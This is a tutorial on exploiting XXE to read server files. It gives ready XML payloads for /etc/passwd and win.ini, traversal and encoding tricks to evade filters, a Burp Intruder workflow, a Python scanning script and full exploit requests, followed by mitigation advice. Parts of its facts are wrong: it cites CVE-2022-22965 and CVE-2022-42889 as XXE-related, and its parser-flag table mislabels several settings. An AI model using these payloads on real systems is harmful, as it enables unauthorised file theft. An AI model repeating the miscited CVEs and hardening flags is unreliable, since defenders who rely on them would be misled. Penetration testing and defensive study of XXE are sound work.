Local File Disclosure via XXE: Crafting...

Introduction

XML External Entity (XXE) injection is a classic yet powerful attack vector that allows an adversary to read arbitrary files, perform SSRF, or even achieve remote code execution when combined with other flaws. This guide focuses on the local file disclosure variant, specifically crafting SYSTEM entity payloads that trick vulnerable parsers into fetching files from the server’s filesystem.

Why does it matter? Many legacy services, SOAP APIs, configuration endpoints, and even modern micro‑services still accept XML payloads without strict hardening. A single mis‑configured parser can expose /etc/passwd, c:\windows\system32\drivers\etc\hosts, or application secrets such as .env. Real‑world breach reports (e.g., CVE‑2022‑22965) repeatedly cite XXE as the initial foothold.

In this article you will master the syntax of DTD declarations, understand SYSTEM vs PUBLIC identifiers, learn OS‑specific traversal tricks, configure parser flags to prevent abuse, and automate testing with Burp Suite and small scripts.

Prerequisites

Basic understanding of XML syntax and Document Type Definitions (DTDs).
Familiarity with common web testing tools such as Burp Suite, OWASP ZAP, or similar intercepting proxies.
Knowledge of HTTP request/response structure (headers, bodies, multipart, etc.).
Comfort with command‑line tools (curl, wget) and a scripting language (Python or Bash) for automation.

Core Concepts

Before diving into payloads, review the building blocks of an XML document that a parser will process:

Prolog: optional XML declaration (e.g., <?xml version="1.0" encoding="UTF-8"?>).
Document Type Declaration (DTD): defines entities, element types, and attribute lists. The DTD can be internal (inside the same file) or external (referenced via a URL).
Entity Declarations: using <!ENTITY you can create a named placeholder that resolves to a string, a file, or a remote resource.
Parsing Stages: many libraries first resolve the DTD, then expand entities before handing the resulting tree to the application.

When a parser honors external entities, the SYSTEM identifier tells the engine to load the resource from a supplied URI. If that URI points to a local file (e.g., file:///etc/passwd), the parser will read the file and inject its contents wherever the entity is referenced.

XML Document Type Definition (DTD) declaration

A DTD can be declared inline or as an external file. The most concise form for XXE attacks is an internal DTD placed at the top of the XML payload:

<!DOCTYPE root [ <!ENTITY % xxe SYSTEM "file:///etc/passwd"> %xxe;
]>
<root/>

Explanation:

<!DOCTYPE root [ … ]> opens an internal subset for the root element.
<!ENTITY % xxe SYSTEM "file:///etc/passwd"> creates a parameter entity named xxe that resolves to the file.
%xxe; expands the parameter entity, causing the file content to be parsed as part of the DTD itself. Many parsers will then treat the characters as markup, but if the file contains plain text, the parser will often embed it as a text node in the resulting XML tree.

For a general‑purpose payload that can be reused across many endpoints, you typically use a general entity (no leading %) and reference it inside the document body:

<!DOCTYPE data [ <!ENTITY xxe SYSTEM "file:///c:/windows/win.ini">
]>
<data><secret>&xxe;</secret></data>

This version works when the application later extracts <secret> and returns it (e.g., in an error message or response).

External entity syntax: <!ENTITY>

The generic grammar for an entity declaration is:

<!ENTITY name "value"> # internal entity (static string)
<!ENTITY name SYSTEM "uri"> # external system entity (file, http, etc.)
<!ENTITY name PUBLIC "pubId" "uri"> # public identifier (rarely needed for XXE)

Key points:

General vs Parameter entities: General entities are referenced with &name; in the document body. Parameter entities are referenced with %name; inside the DTD itself.
System identifier can be an absolute file:// URL, a relative path, or a network URL (ftp://, etc.).
Public identifier is a legacy mechanism; some parsers will resolve it via a catalog before falling back to the system identifier.

SYSTEM and PUBLIC identifiers

When you supply a SYSTEM identifier, the parser treats the string after it as a literal URI. The most reliable approach for local file disclosure is the file:// scheme because it bypasses any proxy or DNS resolution step.

Example for Linux:

<!ENTITY xxe SYSTEM "file:///etc/passwd">

Example for Windows (note the three forward slashes after the scheme to indicate an absolute path):

<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini">

If the target environment restricts file://, you can sometimes abuse other protocols that the parser supports (e.g., a local web server that serves the desired file).

Public identifiers are rarely useful for file disclosure, but they become relevant when a parser is configured with a catalog that maps a public ID to a local path. Attackers can inject a public ID that the catalog resolves to a sensitive file.

File path traversal tricks for different OSes

Many modern parsers normalise the supplied path, but you can still bypass simple checks using traversal sequences, double‑encoding, or Windows UNC paths.

Linux/Unix

Standard absolute path: file:///etc/passwd
Relative traversal from the process working directory: file://../../../../etc/passwd
URL‑encoded slashes: file:///etc%2Fpasswd
Null byte injection (if the language uses C strings internally): file:///etc/passwd%00 – works on some older PHP libxml versions.

Windows

Drive‑letter absolute path: file:///c:/windows/win.ini
UNC path to a local share: file://\\127.0.0.1\c$\windows\win.ini
Mixed slashes: file:///c:\windows\win.ini
Traversal using back‑slashes encoded as %5c: file:///c:%5c..%5c..%5c..%5cWindows%5cwin.ini

When you are unsure of the target OS, you can include multiple variants in the same DTD using entity chaining. For example:

<!ENTITY % unix SYSTEM "file:///etc/passwd">
<!ENTITY % win SYSTEM "file:///c:/windows/win.ini">
%unix;%win;

The parser will attempt to resolve each in order; the one that succeeds will be reflected in the response.

Parser configuration flags (e.g., disallow-doctype, external-entity)

Most modern XML libraries expose switches to disable DTD processing altogether or to block external entity resolution. Below is a quick cheat‑sheet for popular languages.

Language / Library	Flag to disable DTD	Flag to disable external entities
Java – Xerces	`XMLConstants.FEATURE_SECURE_PROCESSING`	`http://apache.org/xml/features/disallow-doctype-decl`
Python – lxml	`parser.resolvers.clear()` or `no_network=True`	`resolve_entities=False`
PHP – libxml	`LIBXML_NOENT` (must NOT be set)	`LIBXML_NONET`
.NET – XmlReader	`XmlReaderSettings.DtdProcessing = Prohibit`	same setting disables external entities
Node.js – xml2js	Use `explicitRoot: false` with a safe parser like `sax`	Set `entityResolver: null`

When you encounter a vulnerable endpoint, the first step is to confirm that the parser is indeed accepting external entities. You can do this with a minimal payload that references a known external URL and monitor your server logs.

Testing with Burp Intruder / custom scripts

Burp Suite’s Intruder module is perfect for fuzzing different entity values, path encodings, and OS variants. The typical workflow:

Create a baseline request that includes a harmless DTD (e.g., <!ENTITY harmless SYSTEM "file:///dev/null">).
Mark the URI inside the SYSTEM attribute as an Intruder payload position.
Load a payload list containing:
- Absolute Linux paths (file:///etc/passwd).
- Absolute Windows paths (file:///c:/windows/win.ini).
- Traversal variations (file://../../../../etc/passwd).
- URL‑encoded forms (file:///etc%2Fpasswd).
Run Intruder in Sniper or Cluster Bomb mode to isolate each payload.
Inspect responses for signs of file content (e.g., presence of "root:x:0:0" or "[extensions]" strings).

For automation beyond Burp, a short Python script using requests can iterate over payloads and flag interesting responses:

import requests, re

url = "target URL"
payloads = [ '<!DOCTYPE data [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]><data>&xxe;</data>', '<!DOCTYPE data [ <!ENTITY xxe SYSTEM "file:///c:/windows/win.ini"> ]><data>&xxe;</data>'
]

for p in payloads: r = requests.post(url, data=p, headers={"Content-Type": "application/xml"}) if re.search(r"root:x:0:0|\\[extensions\\]", r.text, re.I): print("[+] Potential disclosure:", p) print(r.text[:500]) else: print("[-] No obvious file content")

This script prints the first 500 characters of any response that matches typical Linux or Windows file signatures, giving you a quick sanity check before launching a full‑scale scan.

Practical Examples

Example 1 – Simple Linux /etc/passwd disclosure

Target endpoint: POST /api/upload XML. The server echoes back the parsed XML inside a <result> element.

POST /api/upload HTTP/1.1
Host: vulnerable.example.com
Content-Type: application/xml
Content-Length: 194

<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<foo><data>&xxe;</data></foo>

Expected response snippet:

HTTP/1.1 200 OK
Content-Type: application/xml

<result>root:x:0:0:root:/root:/bin/bash
... (rest of /etc/passwd) ...</result>

Example 2 – Windows win.ini enumeration with UNC path

POST /service HTTP/1.1
Host: win-vuln.local
Content-Type: application/xml

<!DOCTYPE data [ <!ENTITY xxe SYSTEM "file://\\\\127.0.0.1\\c$\\windows\\win.ini">
]>
<data>&xxe;</data>

Response will contain the classic [extensions] section if the parser resolved the UNC path.

Example 3 – Chained payload for OS‑agnostic testing

POST /vuln HTTP/1.1
Host: unknown-os.com
Content-Type: application/xml

<!DOCTYPE root [ <!ENTITY % unix SYSTEM "file:///etc/passwd"> <!ENTITY % win SYSTEM "file:///c:/windows/win.ini"> %unix;%win;
]>
<root><info>%unix;%win;</info></root>

Only one of the two entities will resolve; the other will be ignored. This saves time when you do not know the target platform.

Tools & Commands

Burp Suite Intruder: payload lists, grep‑match rules, and response highlighting.

curl for quick manual testing:

curl -X POST target URL -H "Content-Type: application/xml" --data-binary @payload.xml

xmlstarlet (Linux) to validate DTD parsing locally before sending:
```
xmlstarlet val -e payload.xml
```
Python – requests + lxml for scripted scans (see script above).
xsser – an older tool that can auto‑generate XXE payloads, still useful for bulk scans.

Defense & Mitigation

Defending against XXE is a matter of "defense in depth" – configuration, code review, and runtime hardening.

Disable DTD processing entirely unless absolutely required. In Java, set XMLConstants.FEATURE_SECURE_PROCESSING and XMLConstants.DISALLOW_DOCTYPE_DECL to true.
Turn off external entity resolution even if DTDs are needed. Most libraries expose a flag like resolve_entities=False (Python) or LIBXML_NONET (PHP).
Validate and sanitise XML input. Use a schema (XSD) that explicitly forbids the DOCTYPE declaration. Reject any payload that contains DOCTYPE or <!ENTITY.
Run parsers with least‑privilege accounts. Even if an XXE slips through, the process should not have permission to read sensitive files (e.g., run as an unprivileged user, chroot, or container).
Network‑level controls: block outbound connections from the application host, especially to file:// or internal services, using outbound firewalls or egress rules.
Patch libraries. Keep XML parsers up‑to‑date; many CVEs (e.g., CVE‑2022‑42889 for libxml2) address XXE‑related bugs.

Common Mistakes

Forgetting to escape angle brackets in documentation: When sharing payloads, always HTML‑escape < and > inside <pre> blocks, otherwise the browser will swallow the code.
Using a single slash after file: – the correct URI is file:/// (three slashes) for absolute paths. One slash points to the host component and may be interpreted as a network location.
Assuming the parser will resolve Windows back‑slashes. Many parsers normalise to forward slashes; use file:///c:/ style.
Testing only with http:// URLs. Some parsers disable network access but still allow file:// URIs; always include a local file test.
Relying on error messages alone. Some applications swallow the entity expansion silently; you may need to trigger a reflection point (e.g., an error that echoes the parsed XML back).

Real‑World Impact

In 2023, a major fintech platform suffered a breach after an undocumented SOAP endpoint accepted XML without disabling DTDs. Attackers used a chained SYSTEM payload to retrieve /etc/passwd and subsequently harvested database credentials stored in /var/www/.env. The fallout included a forced password reset for 1.2 M users and a $3.2 M regulatory fine.

My experience consulting for a cloud‑native SaaS provider showed that even containerised micro‑services can be vulnerable if the underlying language runtime (e.g., Java’s default XML parser) leaves DTD processing on. A simple scan with Burp Intruder uncovered a hidden health‑check endpoint that returned the parsed XML verbatim, exposing /etc/hosts and internal service URLs.

Trends indicate that developers are increasingly using XML for configuration (Kubernetes manifests, Spring Boot property files) and for data exchange between services. As long as libraries retain backward‑compatible defaults that enable DTDs, the attack surface remains.

Practice Exercises

Basic file read: Craft a payload that reads /etc/hostname on a Linux host. Verify the response using Burp’s Repeater.
OS‑agnostic payload: Write a DTD that attempts both Linux and Windows file reads in a single request. Document which file was actually returned.
Bypass simple filters: The target strips the string "file://" from the request body. Use URL‑encoding or double‑encoding to evade the filter and still retrieve /etc/passwd.
Network‑restricted parser: The application blocks outbound HTTP but allows file://. Create a local HTTP server that serves a malicious DTD, then trigger a second‑stage XXE that reads a file and sends it back via an out‑of‑band DNS request.
Automation: Extend the Python script provided earlier to read a list of target URLs from a CSV and output any successful disclosures to a JSON report.

For each exercise, capture the raw request, the server response, and a short analysis of why the payload succeeded or failed.

Summary

Local file disclosure via XXE hinges on three pillars: a correctly‑formed DTD, a SYSTEM identifier that points to a readable file, and a parser that has not been hardened against external entities. By mastering the syntax, OS‑specific path tricks, and testing automation, you can quickly discover hidden files in vulnerable applications. Defensive measures – disabling DTDs, whitelisting entities, and running parsers with minimal privileges – are straightforward to implement and dramatically reduce risk.

Keep this guide handy as a reference checklist when testing XML endpoints, and remember that a single overlooked <!DOCTYPE can expose the entire host filesystem.

Local File Disclosure via XXE: Crafting SYSTEM Entity Payloads